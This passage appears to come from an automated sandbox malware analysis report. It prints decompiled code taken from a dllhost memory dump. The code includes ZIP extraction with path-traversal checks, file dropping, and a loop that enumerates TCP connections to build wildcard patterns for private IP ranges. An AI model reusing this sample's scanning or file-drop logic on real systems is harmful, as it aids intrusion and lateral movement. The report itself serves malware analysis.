                                                												_v660 = _t380 >> 0x0000001e & 0xffffff01;
                                                												_t334 =  !(_t380 >> 0x17) & 0x00000001;
                                                												_t223 = _v620 >> 8;
                                                												_v648 = 0;
                                                												_v652 = 0;
                                                												_v644 = 1;
                                                												__eflags = _t223;
                                                												if(_t223 == 0) {
                                                													L49:
                                                													_t334 = _t380 & 0x00000001;
                                                													_v648 = _t380 >> 0x00000001 & 0xffffff01;
                                                													_v652 = _t380 >> 0x00000002 & 0xffffff01;
                                                													_v660 = _t380 >> 0x00000004 & 0x00000001;
                                                													_t235 = _t380 >> 0x00000005 & 0xffffff01;
                                                													__eflags = _t235;
                                                													_v644 = _t235;
                                                												} else {
                                                													__eflags = _t223 - 7;
                                                													if(_t223 == 7) {
                                                														goto L49;
                                                													} else {
                                                														__eflags = _t223 - 0xb;
                                                														if(_t223 == 0xb) {
                                                															goto L49;
                                                														} else {
                                                															__eflags = _t223 - 0xe;
                                                															if(_t223 == 0xe) {
                                                																goto L49;
                                                															}
                                                														}
                                                													}
                                                												}
                                                												__eflags = _v660;
                                                												_t237 =  !=  ? 0x10 : 0;
                                                												__eflags = _v644;
                                                												 *(_t307 + 0x108) =  !=  ? 0x10 : 0;
                                                												if(_v644 != 0) {
                                                													_t82 = _t307 + 0x108;
                                                													 *_t82 =  *(_t307 + 0x108) | 0x00000020;
                                                													__eflags =  *_t82;
                                                												}
                                                												__eflags = _v648;
                                                												if(_v648 != 0) {
                                                													_t85 = _t307 + 0x108;
                                                													 *_t85 =  *(_t307 + 0x108) | 0x00000002;
                                                													__eflags =  *_t85;
                                                												}
                                                												__eflags = _t334;
                                                												if(_t334 != 0) {
                                                													_t87 = _t307 + 0x108;
                                                													 *_t87 =  *(_t307 + 0x108) | 0x00000001;
                                                													__eflags =  *_t87;
                                                												}
                                                												__eflags = _v652;
                                                												if(_v652 != 0) {
                                                													_t90 = _t307 + 0x108;
                                                													 *_t90 =  *(_t307 + 0x108) | 0x00000004;
                                                													__eflags =  *_t90;
                                                												}
                                                												_t382 = _v604;
                                                												 *(_t307 + 0x124) = _v596;
                                                												 *(_t307 + 0x128) = _v592;
                                                												_v636.dwLowDateTime = E0286F350(_t382 >> 0x10, _t382);
                                                												_v636.dwHighDateTime = _t382;
                                                												LocalFileTimeToFileTime( &_v636,  &_v628);
                                                												_t338 = _v628.dwLowDateTime;
                                                												_t414 = 0;
                                                												__eflags = _v664 - 4;
                                                												_t244 = _v628.dwHighDateTime;
                                                												 *(_t307 + 0x10c) = _t338;
                                                												 *(_t307 + 0x110) = _t244;
                                                												 *(_t307 + 0x114) = _t338;
                                                												 *(_t307 + 0x118) = _t244;
                                                												 *(_t307 + 0x11c) = _t338;
                                                												 *(_t307 + 0x120) = _t244;
                                                												if(_v664 <= 4) {
                                                													L77:
                                                													_t339 = _v656;
                                                												} else {
                                                													_t250 = _v656;
                                                													_v658 = 0;
                                                													_t383 = _t250 + 1;
                                                													while(1) {
                                                														L61:
                                                														_t345 = "UT";
                                                														_v660 =  *(_t414 + _t250) & 0x000000ff;
                                                														_v659 =  *(_t383 + _t414) & 0x000000ff;
                                                														_t253 =  &_v660;
                                                														while(1) {
                                                															_t384 =  *_t253;
                                                															__eflags = _t384 -  *_t345;
                                                															if(_t384 !=  *_t345) {
                                                																break;
                                                															}
                                                															__eflags = _t384;
                                                															if(_t384 == 0) {
                                                																L66:
                                                																_t254 = 0;
                                                															} else {
                                                																_t390 =  *((intOrPtr*)(_t253 + 1));
                                                																_t120 = _t345 + 1; // 0x25000054
                                                																__eflags = _t390 -  *_t120;
                                                																if(_t390 !=  *_t120) {
                                                																	break;
                                                																} else {
                                                																	_t253 = _t253 + 2;
                                                																	_t345 = _t345 + 2;
                                                																	__eflags = _t390;
                                                																	if(_t390 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L66;
                                                																	}
                                                																}
                                                															}
                                                															L68:
                                                															__eflags = _t254;
                                                															if(_t254 == 0) {
                                                																_t385 = _v656;
                                                																_v660 = 0x989680;
                                                																_t255 =  *(_t414 + _t385 + 4) & 0x000000ff;
                                                																_t417 = _t414 + 5;
                                                																_v664 = _t255;
                                                																_v664 = _v664 >> 2;
                                                																_v664 = _v664 & 0x00000001;
                                                																_t348 = _t255 >> 0x00000001 & 0xffffff01;
                                                																_v652 = _t348;
                                                																__eflags = _t255 & 0x00000001;
                                                																if((_t255 & 0x00000001) != 0) {
                                                																	_t361 =  *(_t417 + _t385) & 0x000000ff;
                                                																	_t279 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
                                                																	_t417 = _t417 + 4;
                                                																	_t280 = _t279 | _t361;
                                                																	_t282 = _t280 * _v660 + 0xd53e8000;
                                                																	__eflags = _t282;
                                                																	 *(_t307 + 0x11c) = _t282;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x120) = _t280 * _v660 >> 0x20;
                                                																	_t385 = _v656;
                                                																	_t348 = _v652;
                                                																}
                                                																__eflags = _t348;
                                                																if(_t348 != 0) {
                                                																	_t356 =  *(_t417 + _t385) & 0x000000ff;
                                                																	_t270 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
                                                																	_t417 = _t417 + 4;
                                                																	_t271 = _t270 | _t356;
                                                																	_t273 = _t271 * _v660 + 0xd53e8000;
                                                																	__eflags = _t273;
                                                																	 *(_t307 + 0x10c) = _t273;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x110) = _t271 * _v660 >> 0x20;
                                                																}
                                                																__eflags = _v664;
                                                																if(_v664 != 0) {
                                                																	_t262 = ((( *(_t417 + _v656 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 1) & 0x000000ff) << 0x00000008 |  *(_t417 + _t386) & 0x000000ff;
                                                																	_t264 = _t262 * _v660 + 0xd53e8000;
                                                																	__eflags = _t264;
                                                																	 *(_t307 + 0x114) = _t264;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x118) = _t262 * _v660 >> 0x20;
                                                																}
                                                																goto L77;
                                                															} else {
                                                																_t339 = _v656;
                                                																_t383 = _t339 + 1;
                                                																_t414 = _t414 + ( *(_t414 + _t339 + 2) & 0x000000ff) + 4;
                                                																_t125 = _t414 + 4; // 0x4
                                                																__eflags = _t125 - _v664;
                                                																if(_t125 < _v664) {
                                                																	_t250 = _v656;
                                                																	goto L61;
                                                																} else {
                                                																}
                                                															}
                                                															goto L78;
                                                														}
                                                														asm("sbb eax, eax");
                                                														_t254 = _t253 | 0x00000001;
                                                														__eflags = _t254;
                                                														goto L68;
                                                													}
                                                												}
                                                												L78:
                                                												__eflags = _t339;
                                                												if(_t339 != 0) {
                                                													E02870AAF(_t339);
                                                													_t430 = _t430 + 4;
                                                												}
                                                												 *(memcpy( &(_t395[2]), _t307, 0x4b << 2) + 0x134) = _a4;
                                                												_pop(_t416);
                                                												__eflags = _v8 ^ _t430 + 0xc;
                                                												return E02870A5D(_v8 ^ _t430 + 0xc, _t416);
                                                												goto L82;
                                                											}
                                                										} else {
                                                											E02870AAF(_t412);
                                                											_t428 = _t430 + 4;
                                                											goto L24;
                                                										}
                                                									}
                                                								} else {
                                                									_pop(_t418);
                                                									__eflags = _v8 ^ _t427;
                                                									return E02870A5D(_v8 ^ _t427, _t418);
                                                								}
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							if(_t409 == 0xffffffff) {
                                                								L8:
                                                								 *_t307 =  *( *_t395 + 4);
                                                								 *((char*)(_t307 + 4)) = 0;
                                                								 *(_t307 + 0x108) = 0;
                                                								 *(_t307 + 0x10c) = 0;
                                                								 *(_t307 + 0x110) = 0;
                                                								 *(_t307 + 0x114) = 0;
                                                								 *(_t307 + 0x118) = 0;
                                                								 *(_t307 + 0x11c) = 0;
                                                								 *(_t307 + 0x120) = 0;
                                                								 *(_t307 + 0x124) = 0;
                                                								 *(_t307 + 0x128) = 0;
                                                								_pop(_t419);
                                                								__eflags = _v8 ^ _t424;
                                                								return E02870A5D(_v8 ^ _t424, _t419);
                                                							} else {
                                                								memcpy(_t307,  &(_t395[2]), 0x4b << 2);
                                                								_pop(_t421);
                                                								return E02870A5D(_v8 ^ _t424 + 0xc, _t421);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L82:
                                                 			}

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /../$/..\$\../$\..\
                                                • API String ID: 0-3885502717
                                                • Opcode ID: ef3d86f7987c04e209b6525adf3945642c588c4ee357812ec21fc834004b3384
                                                • Instruction ID: c549eaa62ed0ec8b35493933e297a183807372c275e9fbbc54fb53b9b07013b9
                                                • Opcode Fuzzy Hash: ef3d86f7987c04e209b6525adf3945642c588c4ee357812ec21fc834004b3384
                                                • Instruction Fuzzy Hash: 3A0207795043418FC724CF28D4957BABBE1BF95308F084A6DE9DACB681C735E509CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                 [Control-flow graph of function 2865200 (figure not reproduced; legend: Executed / Not Executed). API calls labelled on its nodes: Sleep, GetProcessHeap, HeapAlloc, HeapFree, GetTcpTable, GetTickCount.]
                                                C-Code - Quality: 74%
                                                			E02865200(void* __ebx, void* __edi) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v148;
                                                				intOrPtr _v152;
                                                				long _v156;
                                                				char _v172;
                                                				intOrPtr _v176;
                                                				long _v180;
                                                				char _v196;
                                                				intOrPtr _v200;
                                                				long _v204;
                                                				char _v220;
                                                				signed int _v224;
                                                				long _v228;
                                                				void* _v232;
                                                				signed int _v236;
                                                				intOrPtr _v240;
                                                				signed int* _v244;
                                                				signed int _v248;
                                                				void* __esi;
                                                				signed int _t127;
                                                				signed int _t128;
                                                				long* _t136;
                                                				long* _t137;
                                                				void* _t143;
                                                				signed int _t155;
                                                				intOrPtr* _t160;
                                                				intOrPtr _t161;
                                                				intOrPtr _t163;
                                                				signed int _t164;
                                                				signed int _t168;
                                                				intOrPtr* _t171;
                                                				intOrPtr* _t172;
                                                				signed int _t173;
                                                				intOrPtr _t179;
                                                				intOrPtr _t183;
                                                				intOrPtr _t186;
                                                				signed int _t189;
                                                				signed int _t193;
                                                				intOrPtr* _t195;
                                                				long _t196;
                                                				signed int _t200;
                                                				signed int _t207;
                                                				void* _t215;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t219;
                                                				signed int* _t224;
                                                				intOrPtr* _t225;
                                                				signed int _t226;
                                                				intOrPtr* _t229;
                                                				signed int _t230;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				intOrPtr* _t237;
                                                				signed int _t238;
                                                				long _t242;
                                                				long _t245;
                                                				void* _t247;
                                                				intOrPtr _t250;
                                                				intOrPtr _t251;
                                                				intOrPtr* _t253;
                                                				void* _t254;
                                                				void* _t255;
                                                				void* _t256;
                                                				signed int _t257;
                                                				void* _t258;
                                                				void* _t260;
                                                
                                                				_push(0xffffffff);
                                                				_push(E0288456F);
                                                				_push( *[fs:0x0]);
                                                				_t127 =  *0x288f008; // 0xe7fe870c
                                                				_t128 = _t127 ^ _t257;
                                                				_v20 = _t128;
                                                				_push(__edi);
                                                				_push(_t128);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v224 = 0;
                                                				_v236 = 0;
                                                				Sleep(0x1388); // executed
                                                				E02873440(__edi,  &_v148, 0, 0x80);
                                                				_t253 = GetProcessHeap;
                                                				_t260 = _t258 - 0xe8 + 0xc;
                                                				_v228 = 0;
                                                				_t215 = HeapAlloc(GetProcessHeap(), 0, 0x18);
                                                				_v232 = _t215;
                                                				if(_t215 == 0) {
                                                					L80:
                                                					 *[fs:0x0] = _v16;
                                                					_pop(_t254);
                                                					return E02870A5D(_v20 ^ _t257, _t254);
                                                				}
                                                				_t250 = HeapFree;
                                                				do {
                                                					_t136 =  &_v228;
                                                					_v228 = 0x18;
                                                					__imp__GetTcpTable(_t215, _t136, 1);
                                                					if(_t136 != 0x7a) {
                                                						L4:
                                                						_t137 =  &_v228;
                                                						__imp__GetTcpTable(_t215, _t137, 1);
                                                						if(_t137 != 0) {
                                                							HeapFree(GetProcessHeap(), 0, _t215);
                                                							goto L80;
                                                						}
                                                						_v240 = _t137;
                                                						if( *_t215 <= _t137) {
                                                							goto L77;
                                                						}
                                                						_t14 = _t215 + 0x10; // 0x10
                                                						_t224 = _t14;
                                                						_v244 = _t224;
                                                						asm("o16 nop [eax+eax]");
                                                						do {
                                                							_t217 =  *_t224;
                                                							_v248 = _t217;
                                                							E02873440(_t250,  &_v148, 0, 0x80);
                                                							_push(_t217 >> 0x00000010 & 0x000000ff);
                                                							_push(_t217 >> 0x00000008 & 0x000000ff);
                                                							E02865180( &_v148, 0x80, "%d.%d.%d.*", _t217 & 0x000000ff);
                                                							_t260 = _t260 + 0x24;
                                                							if(_t217 == 0xa) {
                                                								L14:
                                                								__eflags = _v148;
                                                								_v152 = 0xf;
                                                								_v156 = 0;
                                                								_v172 = 0;
                                                								if(_v148 != 0) {
                                                									_t225 =  &_v148;
                                                									_t24 = _t225 + 1; // 0x1
                                                									_t246 = _t24;
                                                									asm("o16 nop [eax+eax]");
                                                									do {
                                                										_t155 =  *_t225;
                                                										_t225 = _t225 + 1;
                                                										__eflags = _t155;
                                                									} while (_t155 != 0);
                                                									_t226 = _t225 - _t246;
                                                									__eflags = _t226;
                                                									L19:
                                                									_push(_t226);
                                                									_push( &_v148);
                                                									E02865A00(_t217,  &_v172, _t250, _t253);
                                                									_t250 =  *0x2896a8c;
                                                									_t255 = E02866530( &_v172,  &_v172);
                                                									_t160 =  *0x2896a8c;
                                                									__eflags = _t255 - _t160;
                                                									if(_t255 == _t160) {
                                                										L29:
                                                										_t253 = _t160;
                                                										L30:
                                                										_t161 = _v152;
                                                										__eflags = _t253 - _t250;
                                                										_t218 = _t217 & 0xffffff00 | _t253 == _t250;
                                                										__eflags = _t161 - 0x10;
                                                										if(_t161 >= 0x10) {
                                                											__eflags = _t161 + 1;
                                                											E02865CF0(_t218, _t246, _t250, _v172, _t161 + 1);
                                                										}
                                                										__eflags = _t218;
                                                										if(_t218 == 0) {
                                                											goto L75;
                                                										} else {
                                                											__eflags = _v148;
                                                											_v152 = 0xf;
                                                											_v156 = 0;
                                                											_v172 = 0;
                                                											if(_v148 != 0) {
                                                												_t229 =  &_v148;
                                                												_t50 = _t229 + 1; // 0x1
                                                												_t246 = _t50;
                                                												do {
                                                													_t164 =  *_t229;
                                                													_t229 = _t229 + 1;
                                                													__eflags = _t164;
                                                												} while (_t164 != 0);
                                                												_t230 = _t229 - _t246;
                                                												__eflags = _t230;
                                                												L38:
                                                												_push(_t230);
                                                												_push( &_v148);
                                                												E02865A00(_t218,  &_v172, _t250, _t253);
                                                												_v8 = 0;
                                                												_t251 =  *0x2896a54;
                                                												_t168 = _v224 | 0x00000001;
                                                												_v224 = _t168;
                                                												_v236 = _t168;
                                                												_t256 = E028664B0( &_v172,  &_v172);
                                                												_t171 =  *0x2896a54;
                                                												__eflags = _t256 - _t171;
                                                												if(_t256 == _t171) {
                                                													L48:
                                                													_t253 = _t171;
                                                													L49:
                                                													__eflags = _t253 - _t251;
                                                													if(_t253 == _t251) {
                                                														_t250 = GetTickCount;
                                                														L58:
                                                														_t219 = 1;
                                                														L59:
                                                														_t232 = _v224;
                                                														__eflags = _t232 & 0x00000002;
                                                														if((_t232 & 0x00000002) != 0) {
                                                															_t186 = _v176;
                                                															_t232 = _t232 & 0xfffffffd;
                                                															_v224 = _t232;
                                                															__eflags = _t186 - 0x10;
                                                															if(_t186 >= 0x10) {
                                                																__eflags = _t186 + 1;
                                                																E02865CF0(_t219, _t246, _t250, _v196, _t186 + 1);
                                                																_t232 = _v224;
                                                															}
                                                															_v176 = 0xf;
                                                															_v180 = 0;
                                                															_v196 = 0;
                                                														}
                                                														_v8 = 0xffffffff;
                                                														__eflags = _t232 & 0x00000001;
                                                														if((_t232 & 0x00000001) != 0) {
                                                															_t183 = _v152;
                                                															_v224 = _t232 & 0xfffffffe;
                                                															__eflags = _t183 - 0x10;
                                                															if(_t183 >= 0x10) {
                                                																__eflags = _t183 + 1;
                                                																E02865CF0(_t219, _t246, _t250, _v172, _t183 + 1);
                                                															}
                                                														}
                                                														__eflags = _t219;
                                                														if(_t219 == 0) {
                                                															goto L75;
                                                														} else {
                                                															__eflags = _v148;
                                                															_v200 = 0xf;
                                                															_v204 = 0;
                                                															_v220 = 0;
                                                															if(_v148 != 0) {
                                                																_t172 =  &_v148;
                                                																_t105 = _t172 + 1; // 0x1
                                                																_t247 = _t105;
                                                																do {
                                                																	_t233 =  *_t172;
                                                																	_t172 = _t172 + 1;
                                                																	__eflags = _t233;
                                                																} while (_t233 != 0);
                                                																_t173 = _t172 - _t247;
                                                																__eflags = _t173;
                                                																L72:
                                                																_push(_t173);
                                                																_push( &_v148);
                                                																E02865A00(_t219,  &_v220, _t250, _t253);
                                                																_v8 = 2;
                                                																_t253 = E028657E0( &_v220,  &_v220);
                                                																 *_t253 = GetTickCount();
                                                																_v8 = 0xffffffff;
                                                																_t179 = _v200;
                                                																__eflags = _t179 - 0x10;
                                                																if(_t179 >= 0x10) {
                                                																	__eflags = _t179 + 1;
                                                																	E02865CF0(_t219, _t246, _t250, _v220, _t179 + 1);
                                                																}
                                                																_t246 = 0;
                                                																__eflags = 0;
                                                																_v200 = 0xf;
                                                																_v204 = 0;
                                                																_v220 = 0;
                                                																E0286B4E0(_t219,  &_v248, 0, _t250, 1);
                                                																_t260 = _t260 + 4;
                                                																goto L75;
                                                															}
                                                															_t173 = 0;
                                                															goto L72;
                                                														}
                                                													}
                                                													__eflags = _v148;
                                                													_v176 = 0xf;
                                                													_v180 = 0;
                                                													_v196 = 0;
                                                													if(_v148 != 0) {
                                                														_t237 =  &_v148;
                                                														_t76 = _t237 + 1; // 0x1
                                                														_t246 = _t76;
                                                														do {
                                                															_t189 =  *_t237;
                                                															_t237 = _t237 + 1;
                                                															__eflags = _t189;
                                                														} while (_t189 != 0);
                                                														_t238 = _t237 - _t246;
                                                														__eflags = _t238;
                                                														L55:
                                                														_push(_t238);
                                                														_push( &_v148);
                                                														E02865A00(_t218,  &_v196, _t251, _t253);
                                                														_v8 = 1;
                                                														_t193 = _v224 | 0x00000002;
                                                														_v224 = _t193;
                                                														_v236 = _t193;
                                                														_t195 = E028657E0( &_v196,  &_v196);
                                                														_t250 = GetTickCount;
                                                														_t253 = _t195;
                                                														_t196 = GetTickCount();
                                                														__eflags = _t196 -  *_t253 - 0x493e0;
                                                														if(_t196 -  *_t253 > 0x493e0) {
                                                															goto L58;
                                                														}
                                                														_t219 = 0;
                                                														goto L59;
                                                													}
                                                													_t238 = 0;
                                                													goto L55;
                                                												}
                                                												__eflags =  *((intOrPtr*)(_t256 + 0x24)) - 0x10;
                                                												_t59 = _t256 + 0x10; // 0x10
                                                												_t246 = _t59;
                                                												_t218 =  *(_t246 + 0x10);
                                                												if( *((intOrPtr*)(_t256 + 0x24)) >= 0x10) {
                                                													_t246 =  *_t246;
                                                												}
                                                												__eflags = _v152 - 0x10;
                                                												_t241 =  >=  ? _v172 :  &_v172;
                                                												__eflags = _v156 - _t218;
                                                												_t199 =  <  ? _v156 : _t218;
                                                												_t200 = E028651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t218);
                                                												_t260 = _t260 + 4;
                                                												__eflags = _t200;
                                                												if(__eflags == 0) {
                                                													_t242 = _v156;
                                                													__eflags = _t242 - _t218;
                                                													if(_t242 >= _t218) {
                                                														__eflags = _t242 - _t218;
                                                														_t68 = _t242 != _t218;
                                                														__eflags = _t68;
                                                														_t200 = 0 | _t68;
                                                													} else {
                                                														_t200 = _t200 | 0xffffffff;
                                                													}
                                                													__eflags = _t200;
                                                												}
                                                												if(__eflags == 0) {
                                                													goto L49;
                                                												} else {
                                                													_t171 =  *0x2896a54;
                                                													goto L48;
                                                												}
                                                											}
                                                											_t230 = 0;
                                                											goto L38;
                                                										}
                                                									}
                                                									__eflags =  *((intOrPtr*)(_t255 + 0x24)) - 0x10;
                                                									_t29 = _t255 + 0x10; // 0x10
                                                									_t246 = _t29;
                                                									_t217 =  *(_t246 + 0x10);
                                                									if( *((intOrPtr*)(_t255 + 0x24)) >= 0x10) {
                                                										_t246 =  *_t246;
                                                									}
                                                									__eflags = _v152 - 0x10;
                                                									_t244 =  >=  ? _v172 :  &_v172;
                                                									__eflags = _v156 - _t217;
                                                									_t206 =  <  ? _v156 : _t217;
                                                									_t207 = E028651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t217);
                                                									_t260 = _t260 + 4;
                                                									__eflags = _t207;
                                                									if(__eflags == 0) {
                                                										_t245 = _v156;
                                                										__eflags = _t245 - _t217;
                                                										if(_t245 >= _t217) {
                                                											__eflags = _t245 - _t217;
                                                											_t38 = _t245 != _t217;
                                                											__eflags = _t38;
                                                											_t207 = 0 | _t38;
                                                										} else {
                                                											_t207 = _t207 | 0xffffffff;
                                                										}
                                                										__eflags = _t207;
                                                									}
                                                									if(__eflags == 0) {
                                                										goto L30;
                                                									} else {
                                                										_t160 =  *0x2896a8c;
                                                										goto L29;
                                                									}
                                                								}
                                                								_t226 = 0;
                                                								goto L19;
                                                							}
                                                							if(_t217 != 0xac) {
                                                								__eflags = _t217 - 0xc0;
                                                								if(_t217 != 0xc0) {
                                                									goto L75;
                                                								}
                                                								__eflags = _t217 - 0xa8;
                                                								if(_t217 != 0xa8) {
                                                									goto L75;
                                                								}
                                                								goto L14;
                                                							}
                                                							if(_t217 < 0x10) {
                                                								goto L75;
                                                							}
                                                							if(_t217 <= 0x1f) {
                                                								goto L14;
                                                							}
                                                							L75:
                                                							_t215 = _v232;
                                                							_t163 = _v240 + 1;
                                                							_t224 =  &(_v244[5]);
                                                							_v240 = _t163;
                                                							_v244 = _t224;
                                                						} while (_t163 <  *_t215);
                                                						_t253 = GetProcessHeap;
                                                						_t250 = HeapFree;
                                                						goto L77;
                                                					}
                                                					HeapFree(GetProcessHeap(), 0, _t215);
                                                					_t215 = HeapAlloc(GetProcessHeap(), 0, _v228);
                                                					_v232 = _t215;
                                                					if(_t215 == 0) {
                                                						goto L80;
                                                					}
                                                					goto L4;
                                                					L77:
                                                					HeapFree(GetProcessHeap(), 0, _t215);
                                                					Sleep(0x1388);
                                                					_v228 = 0;
                                                					_t143 = HeapAlloc(GetProcessHeap(), 0, 0x18);
                                                					_t215 = _t143;
                                                					_v232 = _t143;
                                                				} while (_t215 != 0);
                                                				goto L80;
                                                			}


                                                APIs
                                                • Sleep.KERNELBASE(00001388,E7FE870C), ref: 02865241
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02865271
                                                • HeapAlloc.KERNEL32(00000000), ref: 02865274
                                                • GetTcpTable.IPHLPAPI(00000000,00000000,00000001), ref: 028652A4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 028652B2
                                                • HeapFree.KERNEL32(00000000), ref: 028652B5
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 028652BF
                                                • HeapAlloc.KERNEL32(00000000), ref: 028652C2
                                                • GetTcpTable.IPHLPAPI(00000000,00000018,00000001), ref: 028652E2
                                                • GetTickCount.KERNEL32 ref: 028655F1
                                                • GetTickCount.KERNEL32 ref: 028656F1
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0286577A
                                                • HeapFree.KERNEL32(00000000), ref: 0286577D
                                                • Sleep.KERNEL32(00001388), ref: 02865784
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02865798
                                                • HeapAlloc.KERNEL32(00000000), ref: 0286579B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 028657B6
                                                • HeapFree.KERNEL32(00000000), ref: 028657B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree$CountSleepTableTick
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 4207308331-3742512694
                                                • Opcode ID: 9816e08180e4e03ed4de11d5e0ad1d85224b8b3dfa1e159b1c07b1c3b3f6efdd
                                                • Instruction ID: 218a7435aae7bda2d3751be654d69390a3f7eced7f197f30be009360298697d1
                                                • Opcode Fuzzy Hash: 9816e08180e4e03ed4de11d5e0ad1d85224b8b3dfa1e159b1c07b1c3b3f6efdd
                                                • Instruction Fuzzy Hash: A1F17C789002699FEB30DF64CC98BB9B7B5AB05304F8445E9D44EE7281DB789A88CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 123 286fc10-286fc2e 124 286fc37-286fc46 123->124 125 286fc30-286fc32 call 286f2d0 123->125 127 286fc5f-286fc62 124->127 128 286fc48-286fc5c call 2870a5d 124->128 125->124 130 286fc64-286fc6b call 286ec60 127->130 131 286fc6e-286fc74 127->131 130->131 134 286fc76-286fc7a 131->134 135 286fcc9-286fce1 call 286f4e0 131->135 138 286fcc2-286fcc7 134->138 139 286fc7c-286fc80 134->139 142 286fce3-286fce5 135->142 143 286fd1b-286fd21 135->143 138->134 138->135 139->138 141 286fc82-286fc89 139->141 141->138 144 286fc8b-286fcbf call 286e7c0 141->144 148 286fce7-286fce9 142->148 149 286fcfd 142->149 146 286fd36-286fd3e 143->146 147 286fd23-286fd25 143->147 144->138 153 286fd40-286fd4b 146->153 151 286fd27-286fd29 147->151 152 286fd2b 147->152 148->149 154 286fceb-286fced 148->154 155 286fcff-286fd18 call 286fb00 call 2870a5d 149->155 151->152 156 286fd2e-286fd34 151->156 152->156 153->153 157 286fd4d-286fd4f 153->157 158 286fcf5-286fcfb 154->158 159 286fcef-286fcf3 154->159 156->146 156->147 161 286fd51-286fd57 157->161 162 286fd59-286fd62 157->162 158->155 159->149 159->158 164 286fd8b-286fdb1 wsprintfA 161->164 165 286ff08-286ff0f call 2870e90 162->165 166 286fd68-286fd78 162->166 168 286fdd2-286fe02 call 286fb00 CreateFileA 164->168 171 286fdb3-286fdd0 wsprintfA 166->171 172 286fd7a-286fd7c 166->172 178 286fe04-286fe19 call 2870a5d 168->178 179 286fe1c-286fe30 call 286ef10 168->179 171->168 172->171 175 286fd7e-286fd80 172->175 175->164 177 286fd82-286fd89 175->177 177->164 177->171 184 286fe45-286fe4f 179->184 185 286fe32-286fe3f call 2870ab4 179->185 187 286fe50-286fe71 call 286f090 184->187 185->184 191 286fed7 187->191 192 286fe73-286fe75 187->192 195 286fee1-286feea FindCloseChangeNotification call 286f2d0 191->195 193 286fe77 192->193 194 286fea1-286feab 192->194 196 286fe94-286fe9b 193->196 197 286fe79-286fe92 WriteFile 193->197 194->195 202 286feef-286ff05 call 2870a5d 195->202 200 286fe9d-286fe9f 
196->200 201 286feb9-286fed5 SetFileTime 196->201 197->196 199 286fead-286feb7 197->199 199->195 200->187 200->194 201->195
                                                C-Code - Quality: 84%
                                                			E0286FC10(signed int* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
                                                				signed int _v8;
                                                				char _v267;
                                                				char _v268;
                                                				char _v528;
                                                				struct _FILETIME _v544;
                                                				struct _FILETIME _v552;
                                                				struct _FILETIME _v560;
                                                				long _v564;
                                                				char _v828;
                                                				char _v829;
                                                				struct _OVERLAPPED* _v836;
                                                				long _v840;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t74;
                                                				signed int _t76;
                                                				signed int _t77;
                                                				signed int _t80;
                                                				char _t81;
                                                				void* _t83;
                                                				signed int _t91;
                                                				void* _t97;
                                                				long _t100;
                                                				signed int _t110;
                                                				void* _t111;
                                                				signed int _t120;
                                                				signed int _t125;
                                                				signed int _t127;
                                                				signed int* _t133;
                                                				signed int _t134;
                                                				void* _t136;
                                                				intOrPtr _t142;
                                                				signed int* _t144;
                                                				signed int* _t145;
                                                				signed int _t148;
                                                				signed int* _t156;
                                                				signed int* _t167;
                                                				signed int* _t174;
                                                				signed int _t175;
                                                				void* _t181;
                                                				signed int _t183;
                                                				signed int* _t184;
                                                				long _t186;
                                                				void* _t187;
                                                				void* _t188;
                                                				void* _t189;
                                                				signed int _t190;
                                                				signed int _t192;
                                                				signed int _t197;
                                                				void* _t198;
                                                				void* _t200;
                                                
                                                				_t166 = __edx;
                                                				_t192 = _t197;
                                                				_t198 = _t197 - 0x344;
                                                				_t74 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t74 ^ _t192;
                                                				_t133 = _a8;
                                                				_t174 = __ecx;
                                                				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                					E0286F2D0( *((intOrPtr*)(__ecx)), __edx);
                                                				}
                                                				_t76 =  *_t174;
                                                				_t142 = _a4;
                                                				_t174[1] = 0xffffffff;
                                                				if(_t142 <  *((intOrPtr*)(_t76 + 4))) {
                                                					__eflags = _t142 -  *((intOrPtr*)(_t76 + 0x10));
                                                					if(_t142 <  *((intOrPtr*)(_t76 + 0x10))) {
